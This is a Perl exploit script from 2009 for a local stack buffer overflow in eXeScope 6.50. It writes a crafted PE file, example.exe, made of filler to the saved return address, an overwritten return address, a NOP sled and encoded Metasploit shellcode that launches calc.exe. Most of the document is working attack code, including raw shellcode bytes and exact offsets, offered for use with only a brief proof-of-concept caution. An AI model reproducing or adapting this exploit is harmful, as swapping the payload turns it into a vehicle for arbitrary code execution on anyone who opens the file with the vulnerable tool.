
exescope-overflow.txt

Posted on 24 March 2009

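#!/usr/bin/perl
#
# eXeScope 6.50 Local Buffer Overflow Exploit
#
# Download eXeScope 6.50 at:
# http://hp.vector.co.jp/authors/VA003525/eXeSc650.zip
#
# Exploit by: Koshi ( heykoshi@gmail.com )
#
# Proof of concept: writes example.exe, a crafted PE image that overflows a
# stack buffer when eXeScope 6.50 parses it.  The saved return address is
# overwritten with 0x004d3258 (an address inside eXeScope.exe, per the
# author's note) so that execution lands in a NOP sled followed by a
# Metasploit win32_exec payload that launches calc.exe.  The filler length
# (4148 bytes) and the return address are specific to that build; treat the
# generated example.exe as malicious test data and only open it in an
# isolated analysis VM.
#
use strict;
use warnings;

# Fixed prefix (432 bytes): DOS header, DOS stub, Rich header, PE signature
# and the start of the COFF header, then zero padding.  e_lfanew at offset
# 0x3C is 0xB8, which is where the "PE\0\0" signature below is placed.
my $headers =
    "\x4D\x5A\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xFF\xFF\x00\x00" .
    "\xB8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xB8\x00\x00\x00" .
    "\x0E\x1F\xBA\x0E\x00\xB4\x09\xCD\x21\xB8\x01\x4C\xCD\x21\x54\x68" .
    "\x69\x73\x20\x70\x72\x6F\x67\x72\x61\x6D\x20\x63\x61\x6E\x6E\x6F" .
    "\x74\x20\x62\x65\x20\x72\x75\x6E\x20\x65\x69\x74\x68\x65\x72\x20" .
    "\x77\x61\x79\x21\x21\x0D\x0D\x0A\x24\x00\x00\x00\x00\x00\x00\x00" .
    "\x8F\x8A\xF9\xDB\xCB\xEB\x97\x88\xCB\xEB\x97\x88\xCB\xEB\x97\x88" .
    "\x48\xF7\x99\x88\xCA\xEB\x97\x88\xA2\xF4\x9E\x88\xCA\xEB\x97\x88" .
    "\x22\xF4\x9A\x88\xCA\xEB\x97\x88\x52\x69\x63\x68\xCB\xEB\x97\x88" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x50\x45\x00\x00\x4C\x01\xFF\x00" .
    "\xAB\xBA\x5C\x49\x00\x00\x00\x00\x00\x00\x00\x00\xE0\x00\xF0\x01" .
    "\x00" x 224;

# win32_exec - EXITFUNC=process CMD=calc Size=161 Encoder=ShikataGaNai http://metasploit.com
my $shellcode =
    "\xb8\x82\x0a\x8d\x38\xd9\xc6\xd9\x74\x24\xf4\x5a\x29\xc9\xb1\x23" .
    "\x31\x42\x12\x83\xea\xfc\x03\xc0\x04\x6f\xcd\x38\xf0\x2b\x2e\xc0" .
    "\x01\x3f\x6b\xfc\x8a\x43\x71\x84\x8d\x54\xf2\x3b\x96\x21\x5a\xe3" .
    "\xa7\xde\x2c\x68\x93\xab\xae\x80\xed\x6b\x29\xf0\x8a\xac\x3e\x0f" .
    "\x52\xe6\xb2\x0e\x96\x1c\x38\x2b\x42\xc7\xc5\x3e\x8f\x8c\x99\xe4" .
    "\x4e\x78\x43\x6f\x5c\x35\x07\x30\x41\xc8\xfc\x45\x65\x41\x03\xb2" .
    "\x1f\x09\x20\x40\xe3\x83\xe8\x2c\x68\xa3\xd8\x29\xae\x5c\x15\xba" .
    "\x6f\x91\xae\xcc\x73\x04\x3b\x44\x84\xbd\x35\x1f\x14\xf1\x46\x1f" .
    "\x15\x79\x2e\x23\x4a\x4c\x59\x3b\x22\x27\x5d\x38\x0a\x4c\xce\x56" .
    "\xf5\x6b\x0c\xd5\x61\x14\x2f\x93\x7c\x73\x2f\x44\xe3\x1a\xa3\xe9" .
    "\xe4";

# Assemble the complete file image and return it as a byte string:
#   headers . filler-to-EIP . return address . NOP sled . payload . tail
# The tail is sized so that sled+payload+tail is always 6048 bytes, i.e. the
# total file length does not depend on the payload length.
sub build_payload {
    my $filler = 'A' x 4148;                    # distance to the saved return address
    my $eip    = "\x58\x32\x4D\x00";            # 0x004d3258 - eXeScope.exe (little-endian)
    my $sled   = "\x90" x 20;                   # NOP sled in front of the payload
    my $tail   = 'A' x (6028 - length $shellcode);
    return $headers . $filler . $eip . $sled . $shellcode . $tail;
}

# Write the crafted image to example.exe in the current directory.
# Dies if the file cannot be opened or if the buffered write fails at close.
sub main {
    my $out = 'example.exe';
    open my $fh, '>', $out or die "open $out: $!";
    binmode $fh;
    print {$fh} build_payload();
    close $fh or die "close $out: $!";
    return;
}

main() unless caller;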

 

